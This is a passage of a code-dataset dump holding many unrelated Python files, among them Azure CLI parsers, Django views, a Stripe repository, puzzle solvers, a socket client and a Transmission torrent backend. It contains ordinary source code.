namespace.databases_to_restore.append(database_restore_resource)\n\n\n# pylint: disable=protected-access, too-few-public-methods\nclass CreateGremlinDatabaseRestoreResource(argparse._AppendAction):\n def __call__(self, parser, namespace, values, option_string=None):\n if namespace.gremlin_databases_to_restore is None:\n namespace.gremlin_databases_to_restore = []\n if not values:\n # pylint: disable=line-too-long\n raise CLIError('usage error: --gremlin-databases-to-restore [name=DatabaseName graphs=Graph1 Graph2 ...]')\n gremlin_database_restore_resource = GremlinDatabaseRestoreResource()\n i = 0\n for item in values:\n if i == 0:\n kvp = item.split('=', 1)\n if len(kvp) != 2 or kvp[0].lower() != 'name':\n # pylint: disable=line-too-long\n raise CLIError('usage error: --gremlin-databases-to-restore [name=DatabaseName graphs=Graph1 Graph2 ...]')\n database_name = kvp[1]\n gremlin_database_restore_resource.database_name = database_name\n elif i == 1:\n kvp = item.split('=', 1)\n if len(kvp) != 2 or kvp[0].lower() != 'graphs':\n # pylint: disable=line-too-long\n raise CLIError('usage error: --databases-to-restore [name=DatabaseName graphs=Graph1 Graph2 ...]')\n gremlin_database_restore_resource.graph_names = []\n graph_name = kvp[1]\n gremlin_database_restore_resource.graph_names.append(graph_name)\n else:\n if gremlin_database_restore_resource.graph_names is None:\n gremlin_database_restore_resource.graph_names = []\n gremlin_database_restore_resource.graph_names.append(item)\n i += 1\n namespace.gremlin_databases_to_restore.append(gremlin_database_restore_resource)\n\n\n# pylint: disable=protected-access, too-few-public-methods\nclass CreateTableRestoreResource(argparse._AppendAction):\n def __call__(self, parser, namespace, values, option_string=None):\n if namespace.tables_to_restore is None:\n namespace.tables_to_restore = []\n\n for item in values:\n namespace.tables_to_restore.append(item)\n","sub_path":"src/cosmosdb-preview/azext_cosmosdb_preview/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":4763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"83312572","text":"filepath=input(\"Enter the file path\")\nf=open(filepath,\"w\")\ninputText=\"This is starting of file\"\nwhile(inputText!=\"\"):\n inputText=input(\"Enter the text you want to write\\n\")\n f.writelines(inputText)\n f.writelines(\"\\n\")\nf=open(filepath)\nfor x in f:\n print(x)\n","sub_path":".vscode/WriteFiles.py","file_name":"WriteFiles.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"51196592","text":"\"\"\"\nCreated on Dec 20, 2017\n\n@author: nhan.nguyen\n\nVerify that user can create a pairwise without metadata.\n\"\"\"\n\nimport json\nimport pytest\nfrom indy import did, pairwise\nfrom utilities import utils, common\nfrom test_scripts.functional_tests.pairwise.pairwise_test_base \\\n import PairwiseTestBase\n\n\nclass TestCreatePairwiseWithoutMetadata(PairwiseTestBase):\n @pytest.mark.asyncio\n async def test(self):\n # 1. Create wallet.\n # 2. Open wallet.\n self.wallet_handle = await common.create_and_open_wallet_for_steps(\n self.steps, self.wallet_name, self.pool_name, credentials=self.wallet_credentials)\n\n # 3. 
Create and store 'my_did' by random seed.\n self.steps.add_step(\"Create and store 'my_did' by random seed\")\n (my_did, _) = await utils.perform(self.steps,\n did.create_and_store_my_did,\n self.wallet_handle, \"{}\")\n\n # 4. Create and \"their_did\".\n self.steps.add_step(\"Create 'their_did'\")\n (their_did, _) = await utils.perform(\n self.steps, did.create_and_store_my_did, self.wallet_handle,\n \"{}\")\n\n # 5. Store 'their_did'.\n self.steps.add_step(\"Store 'their_did\")\n await utils.perform(self.steps, did.store_their_did,\n self.wallet_handle,\n json.dumps({\"did\": their_did}))\n\n # 6. Create pairwise without metadata and\n # verify that there is no exception raised.\n self.steps.add_step(\"Create pairwise without metadata and \"\n \"verify that there is no exception raised\")\n await utils.perform(self.steps, pairwise.create_pairwise,\n self.wallet_handle, their_did, my_did, None,\n ignore_exception=False)\n\n # 7. Get created pairwise.\n self.steps.add_step(\"Get created pairwise\")\n pairwise_without_metadata = await utils.perform(self.steps,\n pairwise.get_pairwise,\n self.wallet_handle,\n their_did)\n\n # 8. Verify 'pairwise_without_metadata'.\n self.steps.add_step(\"Verify 'pairwise_without_metadata'\")\n expected_pairwise = utils.create_gotten_pairwise_json(my_did, None)\n utils.check(self.steps, error_message=\"Gotten pairwise mismatches\",\n condition=lambda: json.loads(pairwise_without_metadata) ==\n expected_pairwise)\n","sub_path":"test_scripts/functional_tests/pairwise/pairwise_create_pairwise_without_metadata_test.py","file_name":"pairwise_create_pairwise_without_metadata_test.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"205074898","text":"from datetime import datetime\n\nfrom rest_framework import generics\n\nfrom .models import Bosque\nfrom .api_serializers import BosqueSerializer\n\n\nclass ListaBosques(generics.ListAPIView):\n\n permission_classes = []\n serializer_class= BosqueSerializer\n\n def get_queryset(self):\n \n queryset = Bosque.objects.prefetch_related('arboles').all()\n nombre = self.request.query_params.get('nombre', None)\n tipo = self.request.query_params.get('tipo', None)\n creado = self.request.query_params.get('creado', None)\n actualizado = self.request.query_params.get('actualizado', None)\n if nombre is not None:\n queryset = queryset.filter(nombre=nombre)\n if tipo is not None:\n queryset = queryset.filter(tipo=tipo)\n if creado is not None:\n try:\n creado = datetime.strptime(creado, '%d-%m-%Y')\n queryset = queryset.filter(\n creado__day=creado.day,\n creado__month=creado.month,\n creado__year=creado.year,\n )\n except ValueError:\n pass\n if actualizado is not None:\n try:\n actualizado = datetime.strptime(actualizado, '%d-%m-%Y')\n queryset = queryset.filter(\n actualizado__day=actualizado.day,\n actualizado__month=actualizado.month,\n actualizado__year=actualizado.year,\n )\n except ValueError:\n pass\n return queryset\n\n\nclass CrearBosque(generics.CreateAPIView):\n\n permission_classes = []\n serializer_class = BosqueSerializer\n\n\nclass EditarBosque(generics.UpdateAPIView):\n\n permission_classes = []\n serializer_class = BosqueSerializer\n\n\nclass EliminarBosque(generics.DestroyAPIView):\n\n permission_classes = []\n serializer_class = 
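# `ListaBosques` above narrows the queryset when `creado` (or `actualizado`)
# arrives as a DD-MM-YYYY query parameter; a request such as
# GET /bosques/?creado=20-01-2020 (the URL path is illustrative) reduces to:
from datetime import datetime

creado = datetime.strptime('20-01-2020', '%d-%m-%Y')
queryset = Bosque.objects.filter(creado__day=creado.day,
                                 creado__month=creado.month,
                                 creado__year=creado.year)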
BosqueSerializer\n","sub_path":"ubank/bosque/api_views.py","file_name":"api_views.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"166527449","text":"'''\nExtractors that operate primarily or exclusively on Video stimuli.\n'''\n\nfrom featurex.stimuli.video import VideoStim\nfrom featurex.extractors import Extractor\nfrom featurex.core import Value, Event\nimport numpy as np\n\n# Optional dependencies\ntry:\n    import cv2\nexcept ImportError:\n    pass\n\n\nclass VideoExtractor(Extractor):\n    ''' Base Video Extractor class; all subclasses can only be applied to\n    video. '''\n    target = VideoStim\n\n\nclass DenseOpticalFlowExtractor(VideoExtractor):\n    ''' Extracts total amount of optical flow between every pair of video\n    frames.\n\n    '''\n\n    def _extract(self, stim, show=False):\n\n        events = []\n        for i, f in enumerate(stim):\n\n            img = f.data\n            img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n            if i == 0:\n                last_frame = img\n                total_flow = 0\n\n            flow = cv2.calcOpticalFlowFarneback(\n                last_frame, img, 0.5, 3, 15, 3, 5, 1.2, 0)\n            flow = np.sqrt((flow ** 2).sum(2))\n\n            if show:\n                cv2.imshow('frame', flow.astype('int8'))\n                cv2.waitKey(1)\n\n            last_frame = img\n            total_flow = flow.sum()\n\n            value = Value(stim, self, {'total_flow': total_flow})\n            event = Event(onset=f.onset, duration=f.duration, values=[value])\n            events.append(event)\n\n        return events\n","sub_path":"featurex/extractors/video.py","file_name":"video.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"44128670","text":"from typing import Iterator\nfrom datetime import datetime\nimport stripe\nfrom ..models.customer import Customer\nfrom .base import BaseStripeRepository\n\n\nclass CustomerRepository(BaseStripeRepository):\n    STRIPE_ACCESSOR = 'Customer'\n    OBJECT_TYPE = Customer\n\n    def list(self, *args, **kwargs) -> Iterator[Customer]:\n        return super().list(*args, **kwargs)\n\n    def batches(self, *args, **kwargs) -> Iterator[Customer]:\n        return super().batches(*args, **kwargs)\n\n    def retrieve(self, *args, **kwargs) -> Customer:\n        return super().retrieve(*args, **kwargs)\n\n    def create_object(self, customer_data: stripe.Customer) -> Customer:\n        customer_cards = customer_data.sources.all(limit=1, object='card')\n\n        if len(customer_cards.data) > 0:\n            country = customer_cards.data[0].country\n        else:\n            country = None\n\n        if 'tax_id' in customer_data.metadata:\n            tax_id = customer_data.metadata['tax_id']\n        else:\n            tax_id = None\n\n        return Customer(\n            id=customer_data.id,\n            metadata=customer_data.metadata,\n            created=datetime.utcfromtimestamp(customer_data.created),\n            name=None,\n            email=customer_data.email,\n            country=country,\n            tax_number=tax_id\n        )\n","sub_path":"sync_service/stripe/customers.py","file_name":"customers.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"209558251","text":"\r\ndef swapping():\r\n    file1=input(\"paste your first file :\")\r\n    file2=input(\"paste your second file :\")\r\n\r\n    with open(file1,\"r\") as a:\r\n        data_a = a.read()\r\n    with open(file2,\"r\") as b:\r\n        data_b = b.read()\r\n\r\n    with open(file1,\"w+\") as a:\r\n        a.write(data_b)\r\n    with open(file2,\"w+\") as b:\r\n        
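# `create_object` above calls `datetime.utcfromtimestamp`, which newer
# Python versions deprecate in favor of timezone-aware timestamps; an
# equivalent spelling (a suggestion, not a change to the original record):
from datetime import datetime, timezone

created = datetime.fromtimestamp(1700000000, tz=timezone.utc)  # placeholder epoch value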
b.write(data_a)\r\n\r\nswapping()","sub_path":"swapping.py","file_name":"swapping.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"62153511","text":"from django.db.backends.sqlite3.creation import DatabaseCreation\n\n\nclass ChemicaLiteCreation(DatabaseCreation):\n\n def sql_indexes_for_field(self, model, f, style):\n \"Return specific index creation SQL for the field.\"\n\n from django_chem.db.models.fields import ChemField\n\n output = super(ChemicaLiteCreation, self).sql_indexes_for_field(model,\n f,\n style)\n\n if isinstance(f, ChemField) and f.chem_index:\n #qn = self.connection.ops.quote_name\n db_table = model._meta.db_table\n\n cqn = self.connection.ops.chem_quote_name\n #qn = self.connection.ops.quote_name\n db_table = model._meta.db_table\n\n output.append(style.SQL_KEYWORD('SELECT ') +\n style.SQL_TABLE('mol_structural_index') + '(' +\n style.SQL_TABLE(cqn(db_table)) + ', ' +\n style.SQL_FIELD(cqn(f.column)) + ');')\n\n return output\n","sub_path":"django_chem/db/backends/chemicalite/creation.py","file_name":"creation.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"457432342","text":"import math\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn.parameter import Parameter\n\nfrom .quantizer import LSQ\n\n\nclass QuantConv2d(nn.Conv2d):\n def __init__(self, in_channels, out_channels, kernel_size, stride=1,\n padding=0, dilation=1, groups=1, bias=True, padding_mode='zeros',\n nbits=32, symmetric=False, do_mask=False):\n super(QuantConv2d, self).__init__(in_channels, out_channels, kernel_size, stride,\n padding, dilation, groups, bias, padding_mode)\n self.step = Parameter(torch.Tensor(1))\n\n def forward(self, x):\n quantized_weight = self.weight * self.step\n return self._conv_forward(x, quantized_weight)\n\n\nclass QuantLinear(nn.Linear):\n def __init__(self, in_features, out_features, bias=True, nbits=32, symmetric=False, do_mask=False):\n super(QuantLinear, self).__init__(in_features, out_features, bias)\n self.step = Parameter(torch.Tensor(1))\n\n def forward(self, x):\n quantized_weight = self.weight * self.step\n return F.linear(x, quantized_weight, self.bias)\n","sub_path":"quantization/lsq/iqnn.py","file_name":"iqnn.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"93578832","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport json\nfrom const.constants import NOT_SET, LEVEL1, LEVEL3\nfrom protocols.vrf import VRF, ListVRF\nfrom functions.global_tools import printline\nfrom functions.verbose_mode import verbose_mode\nimport pprint\nPP = pprint.PrettyPrinter(indent=4)\n\n\ndef _arista_vrf_api_converter(\n hostname: str(),\n cmd_output,\n options={}\n) -> ListVRF:\n\n if not isinstance(cmd_output['result'][0], dict):\n cmd_output = json.loads(cmd_output['result'][0])\n else:\n cmd_output = cmd_output['result'][0]\n\n if verbose_mode(\n user_value=os.environ.get(\"NETESTS_VERBOSE\", NOT_SET),\n needed_value=LEVEL3\n ):\n printline()\n print(cmd_output)\n\n vrf_list = ListVRF(list())\n for vrf_name, facts in cmd_output.get('vrfs').items():\n if (\n facts.get('routeDistinguisher', NOT_SET) == NOT_SET or\n facts.get('routeDistinguisher', NOT_SET) == ''\n ):\n rd = NOT_SET\n else:\n rd = facts.get('routeDistinguisher', 
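# `_arista_vrf_api_converter` above only reads a few keys out of the eAPI
# reply; a fabricated payload consistent with that parsing (every value is
# a placeholder, not real device output):
sample = {
    "result": [{
        "vrfs": {
            "default": {"routeDistinguisher": ""},         # empty RD becomes NOT_SET
            "CUSTOMER_A": {"routeDistinguisher": "65000:1"},
        }
    }]
}
vrf_list = _arista_vrf_api_converter("leaf01", sample)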
NOT_SET)\n\n vrf_list.vrf_lst.append(\n VRF(\n vrf_name=vrf_name,\n vrf_id=NOT_SET,\n vrf_type=NOT_SET,\n l3_vni=NOT_SET,\n rd=rd,\n rt_imp=NOT_SET,\n rt_exp=NOT_SET,\n imp_targ=NOT_SET,\n exp_targ=NOT_SET,\n options=options\n )\n )\n\n if verbose_mode(\n user_value=os.environ.get(\"NETESTS_VERBOSE\", NOT_SET),\n needed_value=LEVEL1\n ):\n printline()\n print(f\">>>>> {hostname}\")\n PP.pprint(vrf_list.to_json())\n\n return vrf_list\n","sub_path":"functions/vrf/arista/api/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"244348198","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 8 15:46:30 2018\n\n@author: nzx\n\"\"\"\nimport math\nfrom vector import Vector\n\nEPLISION = 1e-6\n\ndef local2World(d_local,aligned_normal):\n \"\"\"\n \t// u : X\n\t\t// n is normal: Y\n\t\t// v : Z\t\n\t\t// Sample(world coordinate)= Sample(local) * Transform matrix\n\t\t// Transform matrix:\n\t\t// |u.x\t\tu.y\t\tu.z|\t\n\t\t// |n.x\t\tn.y\t\tn.z|\t\n\t\t// |v.x\t\tv.y\t\tv.z|\t\n \n \"\"\"\n \n n = aligned_normal\n if(abs(n.x)abs(n.z)):\n# v = Vector.cross(n,Vector(0,1.0,0))\n# v.normalize()\n# u = Vector.cross(n,v)\n# u.normalize()\n# else:\n# =============================================================================\n u = Vector.cross(Vector(0,1.0,0),n)\n u.normalize()\n v = Vector.cross(u,n)\n v.normalize()\n d_world = Vector(d_local.x*u.x + d_local.y*n.x + d_local.z*v.x,\n d_local.x*u.y + d_local.y*n.y + d_local.z*v.y,\n d_local.x*u.z + d_local.y*n.z + d_local.z*v.z)\n return d_world\n \ndef transform(d_in,transform_vec):\n return d_in + transform_vec\n\n\ndef rotateY(origin,old_dir,new_dir):\n \"\"\"\n // Rotate matrix:\n\t\t// |cos\t\t0\t\tsin|\t\n\t\t// |0\t\t1\t\t0 |\t\n\t\t// |-sin\t0\t\tcos|\t\n \"\"\"\n dir = 1 if(Vector.cross(old_dir,new_dir).y >0) else -1\n cos_val = Vector.dot(old_dir,new_dir)\n sin_val = dir*math.sqrt(1-cos_val*cos_val)\n rotate_result = Vector(cos_val*origin.x + sin_val*origin.z,\n origin.y,\n -sin_val*origin.x + cos_val*origin.z)\n \n return rotate_result\n\nif __name__ == \"__main__\":\n origin = Vector(1,0,1)\n aligned = Vector(0,0,1)\n rotated = local2World(origin,aligned)\n rotated.display()","sub_path":"Script/solarEnergy/projection/globalFunc.py","file_name":"globalFunc.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"491055593","text":"# PROJECT EULER PROBLEM 185 - Number Mind\n\nfrom collections import Counter\n\n# Parse guess list\ndef readGuesses():\n guess_list = []\n with open(\"p185_realGuesses.txt\") as file:\n for line in file:\n guess = line.rstrip(\" correct\\n\")\n guess = guess.split(\" ;\")\n guess[1] = int(guess[1])\n guess_list.append(guess)\n return(guess_list)\n\n# Generates string bit masks of x digits with n 0s\n# (it's a modified version of older code that was using the 0s rather than\n# the 1s; notice ln 101 of checkGuess uses the 0. I could make it use 1s\n# instead, but... 
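# `rotateY` in globalFunc.py above applies the standard Y-axis rotation
# matrix, deriving the angle from old_dir and new_dir. A hand-checked case,
# assuming that module's Vector implements the usual dot and cross products:
#
#   rotateY(Vector(1, 0, 0), Vector(1, 0, 0), Vector(0, 0, 1))
#   # -> Vector(0, 0, 1): since origin equals old_dir, it lands on new_dir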
meh)\ndef bitList(x,n):\n if x == 0:\n return([])\n out_str = ''\n if n == 0:\n for i in range(x):\n out_str += '1'\n return([out_str])\n out_list = []\n new_x = x-1\n new_n = n-1\n for i in range(x-(n-1)):\n i_str = out_str + '0'\n sub_bit_list = bitList(new_x,new_n)\n if not sub_bit_list:\n out_list.append(i_str)\n break\n for bit_str in sub_bit_list:\n new_str = i_str + bit_str\n out_list.append(new_str)\n out_str += '1'\n new_x -= 1\n return(out_list)\n \n\nGUESS = 0\nRIGHT = 1\n\nguess_list = readGuesses()\nNUM_OF_GUESSES = len(guess_list)\nDIGITS = len(guess_list[0][GUESS])\n\n# Recursively goes through the guesses and assumes each possible\n# combination of numbers is correct. If it finds a logical contradiction\n# it'll skip to the next assumption and continue\n# guess_num => The index of the current guess\n# guess_list => The guess list made from the .txt file of guesses\n# right_digits => The assumed correct digits, with 'x' as wildcards\n# right_so_far => How many digits are assumed correct so far\n# (rather than counting non-wildcards from right_digits)\ndef checkGuess(guess_num,guess_list,right_digits,right_so_far):\n \n # This is an end condition of the recursive checkGuess function.\n # If it has gone through all the given guesses it will see if\n # there are any wildcards ('x') left in the 'right_digits' string.\n # If there is, it'll check through the guesses again to see\n # if that digit has only one possibility left. If so then\n # the wildcard is replaced by the only possible digit remaining\n if guess_num == NUM_OF_GUESSES:\n if 'x' in right_digits:\n for d in range(DIGITS):\n if right_digits[d] == 'x':\n digit_list = [str(n) for n in range(10)]\n for n in digit_list[:]:\n for i in range(NUM_OF_GUESSES):\n if guess_list[i][GUESS][d] == n:\n digit_list.remove(n)\n break\n if len(digit_list) == 1:\n right_digits = right_digits[:d] + digit_list[0] + right_digits[d+1:]\n else:\n return(False)\n return(right_digits)\n \n check_guess = guess_list[guess_num][GUESS]\n check_right = guess_list[guess_num][RIGHT]\n #print(check_guess)\n \n # See if an assumed right digit matches a number in the next guess\n # and reduce the number of right digits in the next guess\n x_count = 0\n for d in range(DIGITS):\n if right_digits[d] != 'x':\n if right_digits[d] == check_guess[d]:\n if check_right == 0:\n return(False)\n else:\n check_right -= 1\n else:\n x_count += 1\n if x_count == 0:\n if check_right > 0:\n return(False)\n else:\n if guess_num+1 == NUM_OF_GUESSES:\n return(right_digits)\n\n # Build the next set of assumed right digits and try them\n if check_right > 0:\n check_right_so_far = right_so_far + check_right\n for bits in bitList(DIGITS-right_so_far,check_right):\n check_right_digits = ''\n next_guess = False\n for d in range(DIGITS):\n if right_digits[d] == 'x':\n b = bits[0:1]\n bits = bits[1:]\n if b == '0':\n new_digit = check_guess[d]\n for i in range(guess_num):\n if guess_list[i][GUESS][d] == new_digit:\n next_guess = True\n break\n if next_guess:\n break\n check_right_digits += new_digit\n else:\n check_right_digits += 'x'\n else:\n check_right_digits += right_digits[d]\n if next_guess:\n continue\n #print(check_right_digits)\n good_guess = checkGuess(guess_num+1,guess_list,check_right_digits,check_right_so_far)\n if good_guess:\n return(good_guess)\n return(False)\n else:\n return(checkGuess(guess_num+1,guess_list,right_digits,right_so_far))\n\nprint(guess_list)\nright_digits = ''\nfor i in range(DIGITS):\n right_digits += 
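# A few hand-traced outputs of `bitList` above: each mask has x digits, n of
# them '0', with the zero sweeping left to right:
#
#   bitList(3, 0)  # -> ['111']
#   bitList(2, 1)  # -> ['01', '10']
#   bitList(3, 1)  # -> ['011', '101', '110']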
'x'\nprint(checkGuess(0,guess_list,right_digits,0))\n\n","sub_path":"PE185/PE185-NumberMind.py","file_name":"PE185-NumberMind.py","file_ext":"py","file_size_in_byte":5231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"445526819","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nAdvent of code\nDay 25 - Part 1\n\"\"\"\n\nimport os\nimport re\nos.chdir(\"/Users/em/Documents/git-projects/adventofcode/2017/d25\")\n\nwith open(\"input.txt\", \"r\") as f:\n    input = f.read()\n    \nlines = input.split('\\n')\n\nstate_pattern = re.compile(r'In state ([A-F]):')\nwrite_pattern = re.compile(r'.*Write the value ([01])\\.')\nmove_pattern = re.compile(r'.*Move one slot to the (\\w+)\\.')\nnext_pattern = re.compile(r'.*Continue with state ([A-F])\\.')\nvalue_pattern = re.compile(r'.*If the current value is ([01]):')\nstep_pattern = re.compile(r'.*Perform a diagnostic checksum after (\\d+) steps\\.')\n\n\ndef create_config(lines):\n    '''\n    Returns a tuple (d, steps)\n    d: dictionary with all the needed information about the reaction \n    depending on state and pointed value.\n    steps: number of step before checksum.\n    '''\n    d = {c: {i: {} for i in range(2)} for c in 'ABCDEF'}\n    for line in lines:\n        m = state_pattern.match(line)\n        if m:\n            current_state = m.group(1)\n        m = value_pattern.match(line)\n        \n        if m:\n            current_value = int(m.group(1))\n        \n        m = write_pattern.match(line)\n        if m:\n            d[current_state][current_value]['write'] = int(m.group(1))\n        \n        m = move_pattern.match(line)\n        if m:\n            if m.group(1)=='left':\n                move=-1\n            elif m.group(1)=='right':\n                move=1\n            else:\n                raise ValueError('Incorrect move pattern')\n            d[current_state][current_value]['move'] = move\n        \n        m = next_pattern.match(line)\n        if m:\n            d[current_state][current_value]['next'] = m.group(1)\n        \n        m = step_pattern.match(line)\n        if m:\n            steps = int(m.group(1))\n\n    return (d, steps)\n\n\nd, steps = create_config(lines)\n\n \nassert(d['A'][1]['write']==0)\nassert(d['E'][0]['move']==-1)\nassert(d['C'][0]['next']=='B')\n\n\nt = {} # tape\np = 0 # position\nstate = 'A'\n\nfor i in range(steps):\n    value = t.get(p, 0)\n    t[p] = d[state][value]['write']\n    p += d[state][value]['move']\n    state = d[state][value]['next']\n\n\nprint('Solution of part 1: {}'.format(sum(t.values())))\n \n \n\n\n\n","sub_path":"2017/d25/d25.py","file_name":"d25.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"262208824","text":"from socket import *\nimport pickle\nimport time\n\nclientSockets= socket(AF_INET, SOCK_STREAM)\nserverNames = \"10.199.61.21\"\n\n\n\ndef createConnections(): #Creating connections with servers.\n\n\tserverPort = 12007\t# ports created\n\n\tclientSockets.connect((serverNames,serverPort))\n\tprint (\"connected to host \"+ serverNames)\n\n\ndef sendToServer(limitSet): #Looping through servers and\n\t                        #sending the search limits 'range' to servers.\n\n\tprint (\"sending range \" + str(limitSet) +\" to host \" + str(serverNames))\n\tdata_numbers = pickle.dumps(limitSet,protocol=2)\n\tclientSockets.send(data_numbers)\n\ndef sendToServerString(string): #Looping through servers and\n\t                        #sending the search limits 'range' to servers.\n\n\tprint(\"Sending string: \" + str(string))\n\tdata_numbers = pickle.dumps(string)\n\tclientSockets.send(data_numbers)\n\n\ndef getReplies(): #Getting replies from servers.\n\n\treplyAnswerSerialized = clientSockets.recv(1024) #Receiving data in Pickle 
format\n\n\treplyAnswerDeserialized = pickle.loads(replyAnswerSerialized)#Converting from Pickle format to 'array' format\n\n\tresults=(replyAnswerDeserialized[0]) #Extracting results from the array\n\ttimes=(replyAnswerDeserialized[1]) #Extracting search time\n\n\treturn results, times\n\ndef closeConnections(): #Closing connections to different servers.\n\n\tclientSockets.close()\n'''\nif __name__ == \"__main__\":#Main function\n\n\tcreateConnections()\t#Creates three connections to servers\n\tfor i in range(10):\n\t\t#createConnections()\t#Creates three connections to servers\n\t\t# lLimit = input(\"input lower limit \")\n\t\t# uLimit = input(\"input upper limit \")\n\t\tx = input(\"x \")\n\t\ty = input(\"y \")\n\t\tz = input(\"z \")\n\t\tax = input(\"ax \")\n\t\tay = input(\"ay \")\n\t\taz = input(\"az \")\n\t\t#string = input(\"Enter the string you wish to send\\n\")\n\t\tprint (\"\\n\")\n\t\tlimitSet = []\n\t\tstartTime=time.time() #Start of connection time\n\n\t\t# limitSet = [lLimit,uLimit] #Breaking range into sets\n\t\tlimitSet = [x, y, z, ax, ay, az]\n\t\tsendToServer(limitSet) #Sending sets to servers\n\n\t\tresults, times = getReplies() #Getting results and search times\n\t\t#replyAnswerSerialized = clientSockets.recv(1024)\n\t\t#replyAnswerDeserialized = pickle.loads(replyAnswerSerialized)\n\t\t#print(replyAnswerDeserialized)\n\t\telapsedTime = time.time() - startTime\n\n\t\ttotalResults = 0\n\t\ttotalTime = 0\n\n\t\tprint (\"got reply = \" + str(results) + \" from host \" +str(serverNames)+ \" after \" +str(times)+ \" seconds\")\n\t\ttotalResults = totalResults + results\n\t\ttotalTime = totalTime + times\n\tcloseConnections() #Closing all connections to servers.\n'''\n","sub_path":"client_old.py","file_name":"client_old.py","file_ext":"py","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"90424638","text":"# Your code here\n# import math and random\nimport random\nimport math\n\n# declare the cache\nfastfun_cache = {}\n\n\ndef slowfun_too_slow(x, y):\n v = math.pow(x, y)\n v = math.factorial(v)\n v //= (x + y)\n v %= 982451653\n\n return v\n\n\ndef slowfun(x, y):\n \"\"\"\n Rewrite slowfun_too_slow() in here so that the program produces the same\n output, but completes quickly instead of taking ages to run.\n \"\"\"\n # Your code here\n # if the x and y are in the cache get if else get it from fn.\n if (x, y) in fastfun_cache:\n return fastfun_cache[(x, y)]\n else:\n v = math.pow(x, y)\n v = math.factorial(v)\n v //= (x + y)\n v %= 982451653\n\n return v\n\n\n# Do not modify below this line!\nfor i in range(50000):\n x = random.randrange(2, 14)\n y = random.randrange(3, 6)\n print(f'{i}: {x},{y}: {slowfun(x, y)}')\n","sub_path":"applications/lookup_table/lookup_table.py","file_name":"lookup_table.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"336077105","text":"import shifter\n\n\ndef shifter_monkey_patch():\n shifter_Client_list = shifter.Client.list\n\n def my_shifter_Client_list(self, *args, **kw):\n try:\n return shifter_Client_list(self, *args, **kw)\n except IndexError:\n return {}\n shifter.Client.list = my_shifter_Client_list\n\n\nclass TransmissionBackend(object):\n def __init__(self, client=shifter.Client()):\n if isinstance(client, shifter.Client):\n shifter_monkey_patch()\n self._client = client\n self._client.list_fields.add('is_finished')\n\n def add(self, torrent):\n try:\n 
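# `shifter_monkey_patch` above wraps `shifter.Client.list` so that the
# IndexError it raises on an empty torrent list degrades to `{}`. The same
# guard written as a reusable decorator (a sketch, not part of the module):
import functools

def swallow(exc, default):
    def deco(fn):
        @functools.wraps(fn)
        def wrapper(*args, **kwargs):
            try:
                return fn(*args, **kwargs)
            except exc:
                return default
        return wrapper
    return deco

# shifter.Client.list = swallow(IndexError, {})(shifter.Client.list)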
self._client.torrent.add(filename=torrent.uri)\n except Exception as e:\n if e.args[0] == 'duplicate torrent':\n pass\n else:\n raise e\n\n def remove(self, torrent):\n return self._client.torrent.remove(torrent.id, delete_local_data=True)\n\n def list(self):\n # Transform shifter data, indexed by hashstr instead of by id\n rev = {}\n for (k, v) in self._client.list().items():\n v['id'] = k\n rev[v['hash_string'].lower()] = v.copy()\n\n is_finished = lambda x: x['is_finished']\n is_seeding = lambda x: x['status'].name == 'seeding'\n is_pending = lambda x: x['status'].name == 'download pending'\n is_downloading = lambda x: x['status'].name == 'downloading'\n #is_paused = lambda x: x['left_until_done'] > 0 and x['status'].name == 'stopped'\n\n for (k, v) in rev.items():\n alt = 'unknow'\n\n if v['status'].name == 'stopped':\n alt = 'done' if is_finished(v) else 'paused'\n\n else:\n if is_pending(v):\n alt = 'queued'\n if is_seeding(v):\n alt = 'seeding'\n if is_downloading(v):\n alt = 'downloading'\n\n v['state'] = alt\n del(v['status'])\n\n return rev\n\n def info(self, hashstr):\n l = self.list()\n\n hashstr = hashstr.lower()\n return l[hashstr] if hashstr in l else None\n","sub_path":"zizi/apps/bypass/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"493142345","text":"\n\nfrom xai.brain.wordbase.nouns._mildew import _MILDEW\n\n#calss header\nclass _MILDEWED(_MILDEW, ):\n\tdef __init__(self,): 